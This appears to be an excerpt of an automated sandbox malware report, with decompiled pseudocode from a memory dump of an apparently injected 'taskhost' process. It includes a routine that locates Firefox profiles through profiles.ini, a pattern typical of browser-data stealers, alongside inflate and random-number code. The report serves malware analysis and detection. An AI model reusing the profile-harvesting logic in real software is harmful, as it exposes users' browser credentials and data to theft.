										_t171 =  *(_t426[2] + (((0x00000001 << _t307) - 0x00000001 & _t423) + _t352) * 4);
										continue;
									}
									_t308 = _t307 & 0x0000000f;
									if(_t308 != 0) {
										if(_t250 < _t308) {
											asm("lodsw");
											_t335 = _t250;
											_t250 = _t250 + 0x10;
											_t423 = _t423 | 0 << _t335;
											_t308 = _t335;
										}
										_t250 = _t250 - _t308;
										_t233 = (0x00000001 << _t308) - 0x00000001 & _t423;
										_t423 = _t423 >> _t308;
										_t352 = _t352 + _t233;
									}
									_t426[6] = _t352;
									if(_t250 <= 0xf) {
										asm("lodsw");
										_t333 = _t250;
										_t250 = _t250 + 0x10;
										_t423 = _t423 | 0 << _t333;
									}
									_t198 =  *(_t426[3] + (_t426[1] & _t423) * 4);
									while(1) {
										_t357 = _t198 >> 0x10;
										_t250 = _t250 - _t198;
										_t423 = _t423 >> _t198;
										_t311 = _t198;
										if((_t198 & 0x00000010) != 0) {
											break;
										}
										if((_t198 & 0x00000040) != 0) {
											L96:
											_t276 = "invalid distance code";
											_t346 = 0x1a;
											goto L101;
										}
										_t198 =  *(_t426[3] + (((0x00000001 << _t311) - 0x00000001 & _t423) + _t357) * 4);
									}
									_t312 = _t311 & 0x0000000f;
									if(_t312 == 0) {
										if(_t357 != 1 || _t426[0xa] == _t363) {
											L38:
											_t426[0xb] = _t390;
											_t205 = _t363 - _t426[0xa];
											if(_t205 < _t357) {
												_t206 = _t426[0xd];
												_t314 =  ~_t205;
												_t407 = _t426[0xe];
												if(_t206 < _t357) {
													L100:
													_t390 = _t426[0xb];
													_t276 = "invalid distance too far back";
													_t346 = 0x1a;
													goto L101;
												}
												_t315 = _t314 + _t357;
												if(_t426[0xc] != 0) {
													_t207 = _t426[0xc];
													if(_t315 <= _t207) {
														_t409 = _t407 + _t207 - _t315;
														_t208 = _t426[6];
														if(_t208 > _t315) {
															_t208 = memcpy(_t363, _t409, _t315);
															_t426 =  &(_t426[3]);
															_t363 = _t409 + _t315 + _t315;
															_t409 = _t363 - _t357;
														}
													} else {
														_t409 = _t407 + _t426[0xd] + _t207 - _t315;
														_t320 = _t315 - _t207;
														_t208 = _t426[6];
														if(_t208 > _t320) {
															_t208 = memcpy(_t363, _t409, _t320);
															_t426 =  &(_t426[3]);
															_t363 = _t409 + _t320 + _t320;
															_t409 = _t426[0xe];
															_t322 = _t426[0xc];
															if(_t208 > _t322) {
																_t208 = memcpy(_t363, _t409, _t322);
																_t426 =  &(_t426[3]);
																_t363 = _t409 + _t322 + _t322;
																_t409 = _t363 - _t357;
															}
														}
													}
												} else {
													_t409 = _t407 + _t206 - _t315;
													_t208 = _t426[6];
													if(_t208 > _t315) {
														_t208 = memcpy(_t363, _t409, _t315);
														_t426 =  &(_t426[3]);
														_t363 = _t409 + _t315 + _t315;
														_t409 = _t363 - _t357;
													}
												}
												_t316 = _t208;
												memcpy(_t363, _t409, _t316);
												_t426 =  &(_t426[3]);
												_t363 = _t409 + _t316 + _t316;
												_t390 = _t426[0xb];
												goto L22;
											}
											_t416 = _t363 - _t357;
											_t326 = _t426[6] - 3;
											 *_t363 =  *_t416;
											_t417 = _t416 + 3;
											 *((char*)(_t363 + 1)) =  *((intOrPtr*)(_t416 + 1));
											 *((char*)(_t363 + 2)) =  *((intOrPtr*)(_t416 + 2));
											memcpy(_t363 + 3, _t417, _t326);
											_t426 =  &(_t426[3]);
											_t363 = _t417 + _t326 + _t326;
											_t390 = _t426[0xb];
										} else {
											_t383 = _t363 - 1;
											_t220 =  *_t383;
											_t329 = _t426[6] - 3;
											 *(_t383 + 1) = _t220;
											 *(_t383 + 2) = _t220;
											 *(_t383 + 3) = _t220;
											_t384 = _t383 + 4;
											memset(_t384, _t220, _t329 << 0);
											_t426 =  &(_t426[3]);
											_t363 = _t384 + _t329;
										}
										goto L22;
									}
									if(_t250 < _t312) {
										asm("lodsw");
										_t332 = _t250;
										_t250 = _t250 + 0x10;
										_t423 = _t423 | 0 << _t332;
										_t312 = _t332;
									}
									_t250 = _t250 - _t312;
									_t225 = (0x00000001 << _t312) - 0x00000001 & _t423;
									_t423 = _t423 >> _t312;
									_t357 = _t357 + _t225;
									goto L38;
								}
								L22:
							} while (_t426[4] > _t363 && _t426[5] > _t390);
							L104:
							if( *0x15fcc40 == 2) {
								_t250 = _t423;
							}
							_t174 = _t426[0x16];
							_t347 =  *((intOrPtr*)(_t174 + 0x1c));
							_t278 = _t250 >> 3;
							_t391 = _t390 - _t278;
							_t251 = _t250 - (_t278 << 3);
							 *(_t174 + 0xc) = _t363;
							 *(_t347 + 0x3c) = _t251;
							_t280 = _t251;
							_t252 =  &(_t426[7]);
							if(_t426[5] == _t252) {
								_t262 =  *_t174;
								_t426[5] = _t262;
								_t391 = _t391 - _t252 + _t262;
								_t426[5] = _t426[5] +  *((intOrPtr*)(_t174 + 4)) - 0xb;
							}
							 *_t174 = _t391;
							_t255 = (1 << _t280) - 1;
							if( *0x15fcc40 == 2) {
								asm("psrlq mm0, mm1");
								asm("movd ebp, mm0");
								asm("emms");
							}
							 *(_t347 + 0x38) = _t423 & _t255;
							_t256 = _t426[5];
							if(_t256 <= _t391) {
								 *((intOrPtr*)(_t174 + 4)) =  ~(_t391 - _t256) + 0xb;
							} else {
								 *((intOrPtr*)(_t174 + 4)) = _t256 - _t391 + 0xb;
							}
							_t257 = _t426[4];
							if(_t257 <= _t363) {
								 *((intOrPtr*)(_t174 + 0x10)) =  ~(_t363 - _t257) + 0x101;
							} else {
								 *((intOrPtr*)(_t174 + 0x10)) = _t257 - _t363 + 0x101;
							}
							asm("popfd");
							return _t174;
						}
						_push(_t170);
						_push(_t249);
						_push(_t274);
						_push(_t343);
						asm("pushfd");
						 *_t426 =  *_t426 ^ 0x00200000;
						asm("popfd");
						asm("pushfd");
						_pop(_t360);
						_t361 = _t360 ^  *_t426;
						if(_t361 == 0) {
							L15:
							 *0x15fcc40 = 3;
							L16:
							_pop(_t343);
							_pop(_t274);
							_pop(_t249);
							_pop(_t170);
							continue;
						}
						asm("cpuid");
						if(_t249 != 0x756e6547 || _t274 != 0x6c65746e || _t361 != 0x49656e69) {
							goto L15;
						} else {
							asm("cpuid");
							if(0xd != 6 || (_t361 & 0x00800000) == 0) {
								goto L15;
							} else {
								 *0x15fcc40 = 2;
								goto L16;
							}
						}
					}
					asm("emms");
					asm("movd mm0, ebp");
					_t423 = _t249;
					asm("movd mm4, dword [esp]");
					asm("movq mm3, mm4");
					asm("movd mm5, dword [esp+0x4]");
					asm("movq mm2, mm5");
					asm("pxor mm1, mm1");
					_t250 = _t426[2];
					do {
						asm("psrlq mm0, mm1");
						if(_t423 <= 0x20) {
							asm("movd mm6, ebp");
							asm("movd mm7, dword [esi]");
							_t390 = _t390 + 4;
							asm("psllq mm7, mm6");
							_t423 = _t423 + 0x20;
							asm("por mm0, mm7");
						}
						asm("pand mm4, mm0");
						asm("movd eax, mm4");
						asm("movq mm4, mm3");
						_t171 =  *(_t250 + _t170 * 4);
						while(1) {
							_t275 = _t171 & 0x000000ff;
							asm("movd mm1, ecx");
							_t423 = _t423 - _t275;
							if(_t171 == 0) {
								break;
							}
							_t345 = _t171 >> 0x10;
							if((_t171 & 0x00000010) == 0) {
								if((_t171 & 0x00000040) != 0) {
									goto L97;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t171 =  *(_t250 + ((_t275 &  *(0x15e514c + (_t171 & 0x0000000f) * 4)) + _t345) * 4);
								continue;
							}
							_t176 = _t171 & 0x0000000f;
							if(_t176 != 0) {
								asm("psrlq mm0, mm1");
								asm("movd mm1, eax");
								asm("movd ecx, mm0");
								_t423 = _t423 - _t176;
								_t345 = _t345 + (_t275 &  *(0x15e514c + _t176 * 4));
							}
							asm("psrlq mm0, mm1");
							if(_t423 <= 0x20) {
								asm("movd mm6, ebp");
								asm("movd mm7, dword [esi]");
								_t390 = _t390 + 4;
								asm("psllq mm7, mm6");
								_t423 = _t423 + 0x20;
								asm("por mm0, mm7");
							}
							asm("pand mm5, mm0");
							asm("movd eax, mm5");
							asm("movq mm5, mm2");
							_t177 =  *(_t426[3] + _t176 * 4);
							while(1) {
								_t283 = _t177 & 0x000000ff;
								_t250 = _t177 >> 0x10;
								_t423 = _t423 - _t283;
								asm("movd mm1, ecx");
								if((_t177 & 0x00000010) != 0) {
									break;
								}
								if((_t177 & 0x00000040) != 0) {
									goto L96;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t177 =  *(_t426[3] + ((_t283 &  *(0x15e514c + (_t177 & 0x0000000f) * 4)) + _t250) * 4);
							}
							_t180 = _t177 & 0x0000000f;
							if(_t180 == 0) {
								if(_t250 != 1 || _t426[0xa] == _t363) {
									L76:
									_t426[0xb] = _t390;
									_t182 = _t363 - _t426[0xa];
									if(_t182 < _t250) {
										_t183 = _t426[0xd];
										_t287 =  ~_t182;
										_t396 = _t426[0xe];
										if(_t183 < _t250) {
											goto L100;
										}
										_t288 = _t287 + _t250;
										if(_t426[0xc] != 0) {
											_t184 = _t426[0xc];
											if(_t288 <= _t184) {
												_t398 = _t396 + _t184 - _t288;
												if(_t345 > _t288) {
													_t345 = _t345 - _t288;
													memcpy(_t363, _t398, _t288);
													_t426 =  &(_t426[3]);
													_t363 = _t398 + _t288 + _t288;
													_t398 = _t363 - _t250;
												}
											} else {
												_t398 = _t396 + _t426[0xd] + _t184 - _t288;
												_t292 = _t288 - _t184;
												if(_t345 > _t292) {
													_t345 = _t345 - _t292;
													memcpy(_t363, _t398, _t292);
													_t426 =  &(_t426[3]);
													_t363 = _t398 + _t292 + _t292;
													_t398 = _t426[0xe];
													_t294 = _t426[0xc];
													if(_t345 > _t294) {
														_t345 = _t345 - _t294;
														memcpy(_t363, _t398, _t294);
														_t426 =  &(_t426[3]);
														_t363 = _t398 + _t294 + _t294;
														_t398 = _t363 - _t250;
													}
												}
											}
										} else {
											_t398 = _t396 + _t183 - _t288;
											if(_t345 > _t288) {
												_t345 = _t345 - _t288;
												memcpy(_t363, _t398, _t288);
												_t426 =  &(_t426[3]);
												_t363 = _t398 + _t288 + _t288;
												_t398 = _t363 - _t250;
											}
										}
										_t289 = _t345;
										_t170 = memcpy(_t363, _t398, _t289);
										_t426 =  &(_t426[3]);
										_t363 = _t398 + _t289 + _t289;
										_t390 = _t426[0xb];
										_t250 = _t426[2];
										goto L64;
									}
									_t405 = _t363 - _t250;
									_t298 = _t345 - 3;
									 *_t363 =  *_t405;
									_t406 = _t405 + 3;
									 *((char*)(_t363 + 1)) =  *((intOrPtr*)(_t405 + 1));
									 *((char*)(_t363 + 2)) =  *((intOrPtr*)(_t405 + 2));
									_t170 = memcpy(_t363 + 3, _t406, _t298);
									_t426 =  &(_t426[3]);
									_t363 = _t406 + _t298 + _t298;
									_t390 = _t426[0xb];
									_t250 = _t426[2];
									goto L64;
								} else {
									_t374 = _t363 - 1;
									_t192 =  *_t374;
									_t301 = _t345 - 3;
									 *(_t374 + 1) = _t192;
									 *(_t374 + 2) = _t192;
									 *(_t374 + 3) = _t192;
									_t375 = _t374 + 4;
									_t170 = memset(_t375, _t192, _t301 << 0);
									_t426 =  &(_t426[3]);
									_t363 = _t375 + _t301;
									_t250 = _t426[2];
									L64:
									if(_t426[4] <= _t363) {
										goto L104;
									}
									goto L65;
								}
							}
							asm("psrlq mm0, mm1");
							asm("movd mm1, eax");
							asm("movd ecx, mm0");
							_t423 = _t423 - _t180;
							_t250 = _t250 + (_t283 &  *(0x15e514c + _t180 * 4));
							goto L76;
						}
						_t170 = _t171 >> 0x10;
						asm("stosb");
						goto L64;
						L65:
					} while (_t426[5] > _t390);
					goto L104;
				}
			}

0x015e51d4
0x015e51d5
0x015e51d8
0x015e51d9
0x015e51dd
0x015e51e3
0x015e51ea
0x015e51ee
0x015e51f6
0x015e51f9
0x015e520a
0x015e520e
0x015e5212
0x015e521c
0x015e5220
0x015e522f
0x015e523d
0x015e5241
0x015e5247
0x015e524a
0x015e524e
0x015e5252
0x015e5256
0x015e5259
0x015e525c
0x015e5260
0x015e5266
0x015e528a
0x015e5290
0x015e5296
0x015e5297
0x015e5299
0x015e529c
0x015e529e
0x00000000
0x015e529e
0x00000000
0x015e5268
0x015e526b
0x015e527e
0x015e527e
0x015e527e
0x015e5280
0x015e5284
0x015e52a2
0x015e52a2
0x015e52a6
0x015e52a6
0x015e52ad
0x00000000
0x00000000
0x015e52b3
0x015e5320
0x015e5323
0x015e5327
0x015e5329
0x015e532b
0x015e5330
0x015e5330
0x015e533b
0x015e533e
0x015e5340
0x015e5342
0x015e5346
0x015e534b
0x015e534b
0x015e534b
0x015e5363
0x015e5366
0x015e536a
0x015e5466
0x015e577a
0x015e577c
0x015e578a
0x015e578f
0x015e577e
0x015e577e
0x015e5783
0x015e5783
0x015e57a6
0x015e57a6
0x015e57ac
0x015e57ae
0x015e57ae
0x015e57b4
0x00000000
0x015e57b4
0x015e547c
0x00000000
0x015e547c
0x015e5370
0x015e5373
0x015e5377
0x015e537d
0x015e537f
0x015e5381
0x015e5386
0x015e5388
0x015e5388
0x015e5392
0x015e5394
0x015e5396
0x015e5398
0x015e5398
0x015e539a
0x015e53a1
0x015e53a5
0x015e53a7
0x015e53a9
0x015e53ae
0x015e53ae
0x015e53ba
0x015e53bd
0x015e53bf
0x015e53c4
0x015e53c6
0x015e53c8
0x015e53cc
0x00000000
0x00000000
0x015e5486
0x015e576e
0x015e576e
0x015e5773
0x00000000
0x015e5773
0x015e549c
0x015e549c
0x015e53d2
0x015e53d5
0x015e543f
0x015e53fe
0x015e53fe
0x015e5404
0x015e540a
0x015e54a6
0x015e54aa
0x015e54ac
0x015e54b2
0x015e5796
0x015e5796
0x015e579a
0x015e579f
0x00000000
0x015e579f
0x015e54b8
0x015e54bf
0x015e54e5
0x015e54eb
0x015e551b
0x015e551d
0x015e5523
0x015e5527
0x015e5527
0x015e5527
0x015e552b
0x015e552b
0x015e54ed
0x015e54f3
0x015e54f5
0x015e54f7
0x015e54fd
0x015e5501
0x015e5501
0x015e5501
0x015e5503
0x015e5507
0x015e550d
0x015e5511
0x015e5511
0x015e5511
0x015e5515
0x015e5515
0x015e550d
0x015e54fd
0x015e54c1
0x015e54c3
0x015e54c5
0x015e54cb
0x015e54cf
0x015e54cf
0x015e54cf
0x015e54d3
0x015e54d3
0x015e54cb
0x015e552d
0x015e552f
0x015e552f
0x015e552f
0x015e5531
0x00000000
0x015e5531
0x015e5416
0x015e5418
0x015e541d
0x015e5425
0x015e5428
0x015e542b
0x015e5431
0x015e5431
0x015e5431
0x015e5433
0x015e5447
0x015e5447
0x015e544c
0x015e544e
0x015e5451
0x015e5454
0x015e5457
0x015e545a
0x015e545d
0x015e545d
0x015e545d
0x015e545d
0x00000000
0x015e543f
0x015e53d9
0x015e53df
0x015e53e1
0x015e53e3
0x015e53e8
0x015e53ea
0x015e53ea
0x015e53f4
0x015e53f6
0x015e53f8
0x015e53fa
0x00000000
0x015e53fa
0x015e534c
0x015e534c
0x015e57b8
0x015e57bf
0x015e57c1
0x015e57c1
0x015e57c3
0x015e57c9
0x015e57cc
0x015e57cf
0x015e57d4
0x015e57d6
0x015e57d9
0x015e57dc
0x015e57de
0x015e57e6
0x015e57ea
0x015e57ec
0x015e57f0
0x015e57f8
0x015e57f8
0x015e57fc
0x015e5805
0x015e580d
0x015e580f
0x015e5812
0x015e5815
0x015e5815
0x015e5819
0x015e581c
0x015e5822
0x015e5835
0x015e5824
0x015e5829
0x015e5829
0x015e5838
0x015e583e
0x015e5857
0x015e5840
0x015e5848
0x015e5848
0x015e585d
0x015e5862
0x015e5862
0x015e52b5
0x015e52b6
0x015e52b7
0x015e52b8
0x015e52b9
0x015e52bd
0x015e52c4
0x015e52c5
0x015e52c6
0x015e52c7
0x015e52c9
0x015e530f
0x015e530f
0x015e5319
0x015e5319
0x015e531a
0x015e531b
0x015e531c
0x00000000
0x015e531c
0x015e52cd
0x015e52d5
0x00000000
0x015e52e7
0x015e52ec
0x015e52f7
0x00000000
0x015e5303
0x015e5303
0x00000000
0x015e5303
0x015e52f7
0x015e52d5
0x015e553c
0x015e553e
0x015e5541
0x015e5543
0x015e5547
0x015e554a
0x015e554f
0x015e5552
0x015e5555
0x015e555c
0x015e555c
0x015e5562
0x015e5564
0x015e5567
0x015e556a
0x015e556d
0x015e5570
0x015e5573
0x015e5573
0x015e5576
0x015e5579
0x015e557c
0x015e557f
0x015e5582
0x015e5582
0x015e5585
0x015e5588
0x015e558c
0x00000000
0x00000000
0x015e55a9
0x015e55ae
0x015e5696
0x00000000
0x00000000
0x015e569f
0x015e56a2
0x015e56ae
0x00000000
0x015e56ae
0x015e55b4
0x015e55b7
0x015e55b9
0x015e55bc
0x015e55bf
0x015e55c2
0x015e55cb
0x015e55cb
0x015e55cd
0x015e55d3
0x015e55d5
0x015e55d8
0x015e55db
0x015e55de
0x015e55e1
0x015e55e4
0x015e55e4
0x015e55eb
0x015e55ee
0x015e55f1
0x015e55f4
0x015e55f7
0x015e55f7
0x015e55fc
0x015e55ff
0x015e5601
0x015e5606
0x00000000
0x00000000
0x015e56ba
0x00000000
0x00000000
0x015e56c3
0x015e56c6
0x015e56d6
0x015e56d6
0x015e560c
0x015e560f
0x015e566b
0x015e5625
0x015e5625
0x015e562b
0x015e5631
0x015e56e2
0x015e56e6
0x015e56e8
0x015e56ee
0x00000000
0x00000000
0x015e56f4
0x015e56fb
0x015e571d
0x015e5723
0x015e574f
0x015e5753
0x015e5755
0x015e5757
0x015e5757
0x015e5757
0x015e575b
0x015e575b
0x015e5725
0x015e572b
0x015e572d
0x015e5731
0x015e5733
0x015e5735
0x015e5735
0x015e5735
0x015e5737
0x015e573b
0x015e5741
0x015e5743
0x015e5745
0x015e5745
0x015e5745
0x015e5749
0x015e5749
0x015e5741
0x015e5731
0x015e56fd
0x015e56ff
0x015e5703
0x015e5705
0x015e5707
0x015e5707
0x015e5707
0x015e570b
0x015e570b
0x015e5703
0x015e575d
0x015e575f
0x015e575f
0x015e575f
0x015e5761
0x015e5765
0x00000000
0x015e5765
0x015e563b
0x015e563d
0x015e5642
0x015e564a
0x015e564d
0x015e5650
0x015e5656
0x015e5656
0x015e5656
0x015e5658
0x015e565c
0x00000000
0x015e5673
0x015e5673
0x015e5676
0x015e5678
0x015e567b
0x015e567e
0x015e5681
0x015e5684
0x015e5687
0x015e5687
0x015e5687
0x015e5689
0x015e5592
0x015e5596
0x00000000
0x00000000
0x00000000
0x015e5596
0x015e566b
0x015e5611
0x015e5614
0x015e5617
0x015e561a
0x015e5623
0x00000000
0x015e5623
0x015e558e
0x015e5591
0x00000000
0x015e559c
0x015e559c
0x00000000
0x015e55a2

Strings

invalid literal/length code, xrefs: 015E578A
invalid distance too far back, xrefs: 015E579A
invalid distance code, xrefs: 015E576E
ntel, xrefs: 015E52D7
Genu, xrefs: 015E52CF
ineI, xrefs: 015E52DF

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID:
String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
API String ID: 0-3089872807
Opcode ID: 9ff6f6ed4e92f0b5cf95f7a0ece838e8b41ddbd237c107f3e1600872c36c64aa
Instruction ID: 1b2283fb9fd5099720a4b411447d61dece0a309987295c84ed9bb04f45b558d6
Opcode Fuzzy Hash: 9ff6f6ed4e92f0b5cf95f7a0ece838e8b41ddbd237c107f3e1600872c36c64aa
Instruction Fuzzy Hash: 1112E539E283458FD71DCE3CC58861EBBE2BB88258F448A2DE995DB701E7719D48CB41

Uniqueness

Uniqueness Score: 0.90%

Function 015E7100, Relevance: .1, Instructions: 114
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E015E7100(signed int* _a4) {
				unsigned int _v8;
				signed int _v12;

				if(_a4[0x270] >= 0x270) {
					_v12 = 0;
					while(_v12 < 0xe3) {
						_v8 = _a4[_v12] & 0x80000000 |  *(_a4 + 4 + _v12 * 4) & 0x7fffffff;
						_a4[_v12] = _v8 >> 0x00000001 ^  *(_a4 + 0x634 + _v12 * 4) ^  *(0x15fccd4 + (_v8 & 0x00000001) * 4);
						_v12 = _v12 + 1;
					}
					while(_v12 < 0x26f) {
						_v8 = _a4[_v12] & 0x80000000 |  *(_a4 + 4 + _v12 * 4) & 0x7fffffff;
						_a4[_v12] = _v8 >> 0x00000001 ^  *(_a4 + _v12 * 4 - 0x38c) ^  *(0x15fccd4 + (_v8 & 0x00000001) * 4);
						_v12 = _v12 + 1;
					}
					_v8 = _a4[0x26f] & 0x80000000 |  *_a4 & 0x7fffffff;
					_a4[0x26f] = _v8 >> 0x00000001 ^ _a4[0x18c] ^  *(0x15fccd4 + (_v8 & 0x00000001) * 4);
					_a4[0x270] = 0;
				}
				_t71 =  &(_a4[0x270]); // 0xc6e8558b
				_v8 = _a4[ *_t71];
				_t77 =  &(_a4[0x270]); // 0xc6e8558b
				_a4[0x270] =  *_t77 + 1;
				_v8 = _v8 >> 0x0000000b ^ _v8;
				_v8 = _v8 << 0x00000007 & 0x9d2c5680 ^ _v8;
				_v8 = _v8 << 0x0000000f & 0xefc60000 ^ _v8;
				_v8 = _v8 >> 0x00000012 ^ _v8;
				return _v8;
			}

0x015e7113
0x015e7119
0x015e712b
0x015e7155
0x015e717d
0x015e7128
0x015e7128
0x015e718d
0x015e71b6
0x015e71de
0x015e718a
0x015e718a
0x015e71fe
0x015e721f
0x015e7228
0x015e7228
0x015e7235
0x015e7241
0x015e7247
0x015e7253
0x015e7262
0x015e7273
0x015e7285
0x015e7291
0x015e729a

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae8fc614556c8614ef44529735dca4fe9df4f5e9e2c0f93fad7cf2a177dad0d0
Instruction ID: 58a0a34959acad64510d0692183135e8a76a0301843b151a82c88749493ae83d
Opcode Fuzzy Hash: ae8fc614556c8614ef44529735dca4fe9df4f5e9e2c0f93fad7cf2a177dad0d0
Instruction Fuzzy Hash: 5E51A874A01209EFDB08CF58C595AADBBF2FF88354F2482A9E8559B345C731AB51DB80

Uniqueness

Uniqueness Score: 0.00%

Function 015D9134, Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 65
stringUNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E015D9134(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v100;
				signed int _t30;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t50;

				_t43 = 8;
				_v36 = 0x25;
				_v32 = 0x27;
				_v28 = _t43;
				_v24 = 0x2e;
				_v20 = 0x24;
				_v16 = 0x23;
				_v12 = 0x1b;
				_v8 = 9;
				_v68 = 0x32;
				_v64 = 0x1a;
				_v60 = 0x56;
				_v56 = 0x2d;
				_v52 = 0x1d;
				_v48 = 0x2f;
				_v44 = 0x52;
				_v40 = 0x5d;
				_t30 = 0;
				while(_a4 !=  *((intOrPtr*)(_t50 + _t30 * 4 - 0x20))) {
					_t30 = _t30 + 1;
					if(_t30 < _t43) {
						continue;
					} else {
						return 0;
					}
					L9:
				}
				if( *0x15fe18c != 0) {
					E015E6020( &_v100, 0x40, "<%s>",  *((intOrPtr*)(0x1602e20 +  *(_t50 + _t30 * 4 - 0x40) * 4)));
					_t48 = _a8;
					if(_t48 != 0) {
						do {
							E015D8E0A( &_v100, lstrlenA( &_v100));
							_t48 = _t48 - 1;
						} while (_t48 != 0);
					}
					return 1;
				} else {
					return 1;
				}
				goto L9;
			}

0x015d913c
0x015d913d
0x015d9144
0x015d914b
0x015d914e
0x015d9155
0x015d915c
0x015d9163
0x015d916a
0x015d9171
0x015d9178
0x015d917f
0x015d9186
0x015d918d
0x015d9194
0x015d919b
0x015d91a2
0x015d91a9
0x015d91ab
0x015d91b4
0x015d91b7
0x00000000
0x015d91b9
0x015d91bc
0x015d91bc
0x00000000
0x015d91b7
0x015d91c4
0x015d91e2
0x015d91e7
0x015d91ef
0x015d91f1
0x015d9200
0x015d9205
0x015d9207
0x015d91f1
0x015d920f
0x015d91c6
0x015d91ca
0x015d91ca
0x00000000

APIs

Part of subcall function 015E6020: wvnsprintfA.SHLWAPI(?,?,?,00000000), ref: 015E604E
Part of subcall function 015E6020: lstrlenA.KERNEL32(00000000), ref: 015E6072

lstrlenA.KERNEL32(?), ref: 015D91F5

Strings

2, xrefs: 015D9171
., xrefs: 015D914E
<%s>, xrefs: 015D91DA
], xrefs: 015D91A2
/, xrefs: 015D9194
', xrefs: 015D9144
R, xrefs: 015D919B
#, xrefs: 015D915C
$, xrefs: 015D9155
V, xrefs: 015D917F
-, xrefs: 015D9186
%, xrefs: 015D913D

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: lstrlen$wvnsprintf
String ID: #$$$%$'$-$.$/$2$<%s>$R$V$]
API String ID: 2688585626-2203221523
Opcode ID: 7c6e5964f0f4336a57e4e1a74993e59a47dfe77a93bf851d9af81228343e9337
Instruction ID: 2061e1bdd2381b88539a5edbe53cab785ac9c2af3114624790ed70a0159e0a6b
Opcode Fuzzy Hash: 7c6e5964f0f4336a57e4e1a74993e59a47dfe77a93bf851d9af81228343e9337
Instruction Fuzzy Hash: 122138B190021C9BEB10CFA9E84C79EBBB4BB04308F105519D115EB280D3BA96488F84

Uniqueness

Uniqueness Score: 100.00%

Function 015DA5DC, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E015DA5DC(intOrPtr _a4, intOrPtr _a8) {
				signed int _v5;
				short _v20;
				char _v36;
				short _v68;
				short _v92;
				void _v120;
				void _v152;
				char _v672;
				short _v1192;
				short _v1712;
				char _v2232;
				long _t38;
				signed int _t66;
				signed int _t70;
				long _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t92;
				void* _t93;

				_t66 = 8;
				_t38 = memcpy( &_v152, L"Mozilla\\Firefox", _t66 << 2);
				_t89 = _t88 + 0xc;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0,  &_v672);
				if(_t38 == 0) {
					_t38 = E015E9070(0,  &_v672,  &_v672,  &_v152);
					_t90 = _t89 + 0xc;
					if(_t38 != 0) {
						_push(6);
						memcpy( &_v120, L"profiles.ini", 0 << 2);
						asm("movsw");
						_t38 = E015E9070(0,  &_v1712,  &_v672,  &_v120);
						_t92 = _t90 + 0x18;
						if(_t38 != 0) {
							_t38 = GetFileAttributesW( &_v1712);
							if(_t38 != 0xffffffff) {
								_t70 = 5;
								memcpy( &_v92, L"IsRelative", _t70 << 2);
								_t93 = _t92 + 0xc;
								asm("movsw");
								asm("movsd");
								asm("movsd");
								asm("movsw");
								_v5 = 0;
								while(1) {
									E015E6020( &_v36, 0xf, "Profile%u", _v5 & 0x000000ff);
									E015E6C80(0,  &_v36,  &_v68, 0x20);
									_t93 = _t93 + 0x1c;
									_t38 = GetPrivateProfileIntW( &_v68,  &_v92, 0xffffffff,  &_v1712);
									_t87 = _t38;
									if(_t87 == 0xffffffff) {
										goto L12;
									}
									_t38 = GetPrivateProfileStringW( &_v68,  &_v20, 0,  &_v1192, 0x104,  &_v1712);
									if(_t38 == 0) {
										L11:
										_v5 = _v5 + 1;
										if(_v5 < 0xfa) {
											continue;
										}
									} else {
										E015E90C0( &_v1192);
										_pop(0);
										_t62 =  &_v1192;
										if(_t87 != 1) {
											L10:
											_t38 = _a4(_t62, _a8);
											_pop(0);
											if(_t38 != 0) {
												goto L11;
											}
										} else {
											_t38 = E015E9070(0,  &_v2232,  &_v672,  &_v1192);
											_t93 = _t93 + 0xc;
											if(_t38 == 0) {
												goto L11;
											} else {
												_t62 =  &_v2232;
												goto L10;
											}
										}
									}
									goto L12;
								}
							}
						}
					}
				}
				L12:
				 *0x15fe1d0 = 1;
				return _t38;
			}

0x015da5ea
0x015da604
0x015da604
0x015da606
0x015da60e
0x015da623
0x015da628
0x015da62d
0x015da633
0x015da63e
0x015da652
0x015da654
0x015da659
0x015da65e
0x015da66b
0x015da674
0x015da67c
0x015da685
0x015da685
0x015da687
0x015da691
0x015da692
0x015da693
0x015da695
0x015da698
0x015da6a8
0x015da6b7
0x015da6bc
0x015da6d0
0x015da6d6
0x015da6db
0x00000000
0x00000000
0x015da6f9
0x015da701
0x015da749
0x015da749
0x015da750
0x00000000
0x00000000
0x015da703
0x015da70a
0x015da70f
0x015da710
0x015da719
0x015da73c
0x015da740
0x015da744
0x015da747
0x00000000
0x00000000
0x015da71b
0x015da72a
0x015da72f
0x015da734
0x00000000
0x015da736
0x015da736
0x00000000
0x015da736
0x015da734
0x015da719
0x00000000
0x015da701
0x015da698
0x015da674
0x015da65e
0x015da62d
0x015da758
